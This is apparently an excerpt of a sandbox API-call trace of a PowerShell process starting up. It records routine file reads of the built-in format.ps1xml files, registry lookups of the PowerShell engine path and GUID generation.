	[0100.235] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xed5c0 | out: lpFileInformation=0xed5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0100.235] SetErrorMode (uMode=0x1) returned 0x1
	[0100.235] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xed3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0100.235] SetErrorMode (uMode=0x1) returned 0x1
	[0100.235] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xed5c0 | out: lpFileInformation=0xed5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0100.235] SetErrorMode (uMode=0x1) returned 0x1
	[0100.235] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0xed3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0100.236] SetErrorMode (uMode=0x1) returned 0x1
	[0100.236] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xed5c0 | out: lpFileInformation=0xed5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0100.236] SetErrorMode (uMode=0x1) returned 0x1
	[0100.236] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0xed3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0100.236] SetErrorMode (uMode=0x1) returned 0x1
	[0100.236] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xed5c0 | out: lpFileInformation=0xed5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0100.236] SetErrorMode (uMode=0x1) returned 0x1
	[0100.236] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0xed3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0100.236] SetErrorMode (uMode=0x1) returned 0x1
	[0100.236] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xed5c0 | out: lpFileInformation=0xed5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0100.236] SetErrorMode (uMode=0x1) returned 0x1
	[0100.238] CoTaskMemAlloc (cb=0x104) returned 0x28e180
	[0100.238] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28e180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0100.238] CoTaskMemFree (pv=0x28e180) 
	[0100.251] CoTaskMemAlloc (cb=0x104) returned 0x28e180
	[0100.251] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28e180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0100.251] CoTaskMemFree (pv=0x28e180) 
	[0100.253] CoTaskMemAlloc (cb=0x104) returned 0x28e180
	[0100.253] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28e180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0100.253] CoTaskMemFree (pv=0x28e180) 
	[0100.254] CoTaskMemAlloc (cb=0x104) returned 0x28e180
	[0100.254] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28e180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0100.254] CoTaskMemFree (pv=0x28e180) 
	[0100.256] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xeccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0100.256] SetErrorMode (uMode=0x1) returned 0x1
	[0100.256] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x330
	[0100.256] GetFileType (hFile=0x330) returned 0x1
	[0100.256] SetErrorMode (uMode=0x1) returned 0x1
	[0100.256] GetFileType (hFile=0x330) returned 0x1
	[0100.256] ReadFile (in: hFile=0x330, lpBuffer=0x32fcef0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x32fcef0*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0100.259] ReadFile (in: hFile=0x330, lpBuffer=0x32fcef0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x32fcef0*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0100.259] ReadFile (in: hFile=0x330, lpBuffer=0x32fcef0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x32fcef0*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0100.259] ReadFile (in: hFile=0x330, lpBuffer=0x32fcef0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x32fcef0*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0100.260] ReadFile (in: hFile=0x330, lpBuffer=0x32fcef0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x32fcef0*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0100.260] ReadFile (in: hFile=0x330, lpBuffer=0x32fcef0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x32fcef0*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0100.260] ReadFile (in: hFile=0x330, lpBuffer=0x32fcef0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x32fcef0*, lpNumberOfBytesRead=0xed258*=0x9e2, lpOverlapped=0x0) returned 1
	[0100.260] ReadFile (in: hFile=0x330, lpBuffer=0x32fc43a, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x32fc43a*, lpNumberOfBytesRead=0xed258*=0x0, lpOverlapped=0x0) returned 1
	[0100.260] ReadFile (in: hFile=0x330, lpBuffer=0x32fcef0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x32fcef0*, lpNumberOfBytesRead=0xed258*=0x0, lpOverlapped=0x0) returned 1
	[0100.261] CloseHandle (hObject=0x330) returned 1
	[0100.261] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xecfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0100.261] SetErrorMode (uMode=0x1) returned 0x1
	[0100.261] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xed200 | out: lpFileInformation=0xed200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0100.261] SetErrorMode (uMode=0x1) returned 0x1
	[0100.261] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xecf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0100.261] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xed2e8 | out: phkResult=0xed2e8*=0x330) returned 0x0
	[0100.261] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed26c, lpData=0x0, lpcbData=0xed268*=0x0 | out: lpType=0xed26c*=0x1, lpData=0x0, lpcbData=0xed268*=0x56) returned 0x0
	[0100.261] CoTaskMemAlloc (cb=0x5a) returned 0x1f4830
	[0100.261] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed23c, lpData=0x1f4830, lpcbData=0xed238*=0x56 | out: lpType=0xed23c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xed238*=0x56) returned 0x0
	[0100.261] CoTaskMemFree (pv=0x1f4830) 
	[0100.262] RegCloseKey (hKey=0x330) returned 0x0
	[0100.262] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xecf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0100.365] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xecde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0100.372] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0x439706ff, Data2=0xe5e7, Data3=0x448e, Data4=([0]=0xbd, [1]=0x34, [2]=0x35, [3]=0xee, [4]=0x20, [5]=0x9f, [6]=0x1c, [7]=0xe4))) returned 0x0
	[0100.376] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0x190ce07c, Data2=0x9395, Data3=0x4d1f, Data4=([0]=0x98, [1]=0xc9, [2]=0xab, [3]=0x94, [4]=0xd6, [5]=0xb5, [6]=0x44, [7]=0x4b))) returned 0x0
	[0100.377] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xeccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0100.377] SetErrorMode (uMode=0x1) returned 0x1
	[0100.377] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x330
	[0100.377] GetFileType (hFile=0x330) returned 0x1
	[0100.378] SetErrorMode (uMode=0x1) returned 0x1
	[0100.378] GetFileType (hFile=0x330) returned 0x1
	[0100.378] ReadFile (in: hFile=0x330, lpBuffer=0x3327a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x3327a58*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0100.379] ReadFile (in: hFile=0x330, lpBuffer=0x3327a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x3327a58*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0100.379] ReadFile (in: hFile=0x330, lpBuffer=0x3327a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x3327a58*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0100.380] ReadFile (in: hFile=0x330, lpBuffer=0x3327a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x3327a58*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0100.380] ReadFile (in: hFile=0x330, lpBuffer=0x3327a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x3327a58*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0100.381] ReadFile (in: hFile=0x330, lpBuffer=0x3327a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x3327a58*, lpNumberOfBytesRead=0xed258*=0xfb2, lpOverlapped=0x0) returned 1
	[0100.381] ReadFile (in: hFile=0x330, lpBuffer=0x3327172, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x3327172*, lpNumberOfBytesRead=0xed258*=0x0, lpOverlapped=0x0) returned 1
	[0100.381] ReadFile (in: hFile=0x330, lpBuffer=0x3327a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x3327a58*, lpNumberOfBytesRead=0xed258*=0x0, lpOverlapped=0x0) returned 1
	[0100.381] CloseHandle (hObject=0x330) returned 1
	[0100.382] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xecfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0100.382] SetErrorMode (uMode=0x1) returned 0x1
	[0100.382] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xed200 | out: lpFileInformation=0xed200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0100.382] SetErrorMode (uMode=0x1) returned 0x1
	[0100.382] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xecf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0100.382] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xed2e8 | out: phkResult=0xed2e8*=0x330) returned 0x0
	[0100.382] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed26c, lpData=0x0, lpcbData=0xed268*=0x0 | out: lpType=0xed26c*=0x1, lpData=0x0, lpcbData=0xed268*=0x56) returned 0x0
	[0100.382] CoTaskMemAlloc (cb=0x5a) returned 0x1b31bba0
	[0100.382] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed23c, lpData=0x1b31bba0, lpcbData=0xed238*=0x56 | out: lpType=0xed23c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xed238*=0x56) returned 0x0
	[0100.383] CoTaskMemFree (pv=0x1b31bba0) 
	[0100.383] RegCloseKey (hKey=0x330) returned 0x0
	[0100.383] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xecf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0100.383] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xecde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0100.385] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0xe6a08cbf, Data2=0x2cce, Data3=0x425f, Data4=([0]=0xb4, [1]=0xc3, [2]=0xdb, [3]=0x21, [4]=0x3e, [5]=0xd4, [6]=0x42, [7]=0x5f))) returned 0x0
	[0100.386] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0xd39d86b5, Data2=0xa959, Data3=0x4b10, Data4=([0]=0xb3, [1]=0xf4, [2]=0xb2, [3]=0xef, [4]=0x9, [5]=0xab, [6]=0x88, [7]=0x57))) returned 0x0
	[0100.387] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0xe6aa5fe7, Data2=0x75ca, Data3=0x4c5f, Data4=([0]=0x82, [1]=0x55, [2]=0xe7, [3]=0x12, [4]=0x1e, [5]=0x6c, [6]=0x59, [7]=0x5d))) returned 0x0
	[0100.388] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0x2b00b1b6, Data2=0x5399, Data3=0x4f0e, Data4=([0]=0x88, [1]=0xb1, [2]=0x5e, [3]=0x67, [4]=0x90, [5]=0xae, [6]=0x2c, [7]=0xf7))) returned 0x0
	[0100.388] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0x9fd5ba5c, Data2=0x799, Data3=0x40bc, Data4=([0]=0xa7, [1]=0xcf, [2]=0x90, [3]=0x98, [4]=0x5f, [5]=0x7d, [6]=0xc5, [7]=0x3c))) returned 0x0
	[0100.389] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0x204f7dcd, Data2=0x3b5d, Data3=0x490d, Data4=([0]=0x8f, [1]=0xf4, [2]=0x6b, [3]=0x33, [4]=0x5c, [5]=0x10, [6]=0xa8, [7]=0x4))) returned 0x0
	[0100.390] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xeccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0100.390] SetErrorMode (uMode=0x1) returned 0x1
	[0100.390] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x330
	[0100.390] GetFileType (hFile=0x330) returned 0x1
	[0100.390] SetErrorMode (uMode=0x1) returned 0x1
	[0100.390] GetFileType (hFile=0x330) returned 0x1
	[0100.390] ReadFile (in: hFile=0x330, lpBuffer=0x33737b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x33737b8*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0100.392] ReadFile (in: hFile=0x330, lpBuffer=0x33737b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x33737b8*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0100.392] ReadFile (in: hFile=0x330, lpBuffer=0x33737b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x33737b8*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0100.392] ReadFile (in: hFile=0x330, lpBuffer=0x33737b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x33737b8*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0100.393] ReadFile (in: hFile=0x330, lpBuffer=0x33737b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x33737b8*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0100.394] ReadFile (in: hFile=0x330, lpBuffer=0x33737b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x33737b8*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0100.394] ReadFile (in: hFile=0x330, lpBuffer=0x33737b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x33737b8*, lpNumberOfBytesRead=0xed258*=0xaca, lpOverlapped=0x0) returned 1
	[0100.394] ReadFile (in: hFile=0x330, lpBuffer=0x3372dea, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x3372dea*, lpNumberOfBytesRead=0xed258*=0x0, lpOverlapped=0x0) returned 1
	[0100.394] ReadFile (in: hFile=0x330, lpBuffer=0x33737b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x33737b8*, lpNumberOfBytesRead=0xed258*=0x0, lpOverlapped=0x0) returned 1
	[0100.394] CloseHandle (hObject=0x330) returned 1
	[0100.394] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xecfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0100.394] SetErrorMode (uMode=0x1) returned 0x1
	[0100.394] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xed200 | out: lpFileInformation=0xed200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0100.394] SetErrorMode (uMode=0x1) returned 0x1
	[0100.395] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xecf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0100.395] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xed2e8 | out: phkResult=0xed2e8*=0x330) returned 0x0
	[0100.395] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed26c, lpData=0x0, lpcbData=0xed268*=0x0 | out: lpType=0xed26c*=0x1, lpData=0x0, lpcbData=0xed268*=0x56) returned 0x0
	[0100.395] CoTaskMemAlloc (cb=0x5a) returned 0x1b31bba0
	[0100.395] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed23c, lpData=0x1b31bba0, lpcbData=0xed238*=0x56 | out: lpType=0xed23c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xed238*=0x56) returned 0x0
	[0100.395] CoTaskMemFree (pv=0x1b31bba0) 
	[0100.395] RegCloseKey (hKey=0x330) returned 0x0
	[0100.395] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xecf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0100.395] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xecde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
